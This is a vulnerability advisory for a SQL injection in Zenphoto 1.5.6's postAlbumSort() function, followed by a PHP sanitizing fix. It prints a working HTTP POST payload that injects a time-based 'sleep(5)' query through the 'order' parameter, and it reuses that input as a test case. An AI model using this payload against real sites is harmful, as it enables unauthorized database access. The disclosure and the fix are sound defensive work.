
CVE-2020-22154

Zenphoto 1.5.6 was discovered to contain a SQL injection via the postAlbumSort() function in /zp-core/admin-functions.php.


Description:
The function postAlbumSort() triggers a SQL query using the POST parameter order; unfortunately, its value is not sanitized when building the query.

Details:
File: /zp-core/admin-functions.php
Function: postAlbumSort()
Parameter: order

Payload:

POST /zp-core/admin-edit.php?page=edit&action=savealbumorder
XSRFToken=bfc6ec5b3fdffce396ca60b824b68e3eb18a5d4c&checkallaction=noaction&newtag_mass_tags_=&massownerselect=admin&order=id%5B2 and (select sleep(5))%23%5D%3Dnull%26id%5B1%5D%3Dnull&update=Save+Order

Recommendation:
Cast the value to an integer before it is used in the query.
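The recommendation above, illustrated as an added PHP example that is not Zenphoto's own code: it assumes the order parameter has already been parsed into an id => position array, and the table and column names (albums, sort_order, id) are placeholders. Keys and values are accepted only when they are plain digit strings, then cast to int, and the update runs through a prepared statement.

```php
<?php
// Added illustration, not Zenphoto code: validate a posted album order array
// before any of it is used in SQL. Table/column names are placeholders.

/**
 * Keep only pairs where both the album id (key) and the sort position (value)
 * are non-negative integer strings; anything else is dropped.
 */
function sanitizeAlbumOrder(array $posted): array {
    $clean = [];
    foreach ($posted as $id => $position) {
        // ctype_digit accepts "2" but rejects "2 and (select sleep(5))#".
        if (!ctype_digit((string) $id) || !ctype_digit((string) $position)) {
            continue;
        }
        $clean[(int) $id] = (int) $position;
    }
    return $clean;
}

/**
 * Persist the sanitized order with a prepared statement. The ids are already
 * integers, so the query text never contains user-controlled data.
 */
function saveAlbumOrder(PDO $db, array $clean): int {
    $stmt = $db->prepare('UPDATE albums SET sort_order = :pos WHERE id = :id');
    $updated = 0;
    foreach ($clean as $id => $pos) {
        $stmt->execute([':pos' => $pos, ':id' => $id]);
        $updated += $stmt->rowCount();
    }
    return $updated;
}

// Constructed input modelled on the advisory's payload: one hostile key that
// must be discarded, one well-formed pair that must survive.
$posted = [
    '2 and (select sleep(5))#' => 'null',
    '1'                        => '3',
];
var_dump(sanitizeAlbumOrder($posted));
```

Only the `1 => 3` pair survives sanitizing; the key carrying the injected SQL is dropped before saveAlbumOrder() is ever called.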

PoC:
cve-2020-22154 Zenphoto sqli